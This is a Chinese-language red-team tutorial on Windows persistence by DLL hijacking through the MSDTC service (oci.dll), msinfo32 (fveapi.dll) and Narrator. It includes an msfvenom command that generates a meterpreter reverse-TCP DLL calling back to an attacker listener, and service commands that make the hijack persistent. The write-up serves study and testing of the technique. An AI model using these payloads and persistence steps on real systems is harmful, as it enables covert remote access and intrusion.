Windows权限维持：利用DLL劫持

文章前言

当程序启动时，系统加载多个 DLL 到进程的内存空间中。Windows 在特定顺序下搜索系统文件夹来查找进程需要的 DLL。这种搜索顺序的劫持可以用于 Red Team 场景，特别是在权限提升和权限维持阶段。

报告显示，常见的恶意软件试图伪装成 Windows 进程中丢失的 DLL，以执行任意代码并保持隐藏。DLL 劫持的攻击面很大，取决于操作系统和安装的软件版本。然而，本文描述了一些在 Windows 7 和 Windows 10 中使用的最著名的工具。

MSDTC

分布式事务协调器（MSDTC）是一个 Windows 服务，负责协调数据库（SQL Server）和 Web 服务器之间的事务。启动此服务时，系统会尝试从 system32 加载以下三个 DLL 文件：

• oci.dll
• SQLLib80.dll
• xa80.dll

这些 DLL 在以下注册表项中定义：

<code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI</code>

在默认的 Windows 安装中，system32 文件夹中缺少 “oci.dll”，这使得有机会在该文件夹中植入一个同名的任意 DLL（需要管理员权限），以便执行恶意代码。Metasploit 实用程序 “msfvenom” 可以生成包含有效负载的 DLL 文件：

<code>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444 -f dll > pentestlab.dll</code>

分布式事务协调器服务可以从 Windows 服务启动，也可以通过从提升的 Shell 执行以下命令来启动：

<code>net start msdtc</code>

当进程启动时，将执行任意 DLL，并以网络服务的权限打开一个 Meterpreter 会话。在进程资源管理器中查看 “msdtc.exe” 进程将验证 DLL 是否已加载到该进程中。

如果从提升的命令提示符执行以下命令，则管理员可以修改权限：

<code>msdtc -install</code>

从 Meterpreter 会话执行 “getuid” 将验证它现在运行的进程是在本地管理员下运行的。

默认情况下，”msdtc” 服务没有配置为在启动时启动，因为启动类型设置为 “手动”。我们可以将服务配置为在启动时自动启动，从而加载任意 DLL，并在系统上创建持久性。

<code>sc qc msdtc sc config msdtc start= auto</code>

MSINFO

虚拟 DLL 劫持是一种依赖于从 Windows 进程加载任意 DLL 的技术。在像 8.1 和 10 这样的现代 Windows 版本中，系统信息工具负责收集有关硬件、软件和系统组件的信息。这个过程试图从 system32 加载一个名为 “fveapi.dll” 的缺失 DLL。我们可以在该目录中植入一个与其同名的恶意 DLL，从而导致该 DLL 被加载到 “msinfo32.exe” 进程中。

Narrator

Microsoft Narrator 是一个用于 Windows 环境的屏幕阅读应用程序。当 “Narrator.exe” 进程启动时，DLL 将被加载到该进程中。这可以从进程资源管理器中看到。同时返回一个会话。

参考链接

https://attack.mitre.org/techniques/T1038/

https://blog.trendmicro.com/trendlabs-security-intelligence/shadow-force-uses-dll-hijacking-targets-south-korean-company/

https://3gstudent.github.io/3gstudent.github.io/Use-msdtc-to-maintain-persistence/

http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5

https://github.com/sensepost/rattler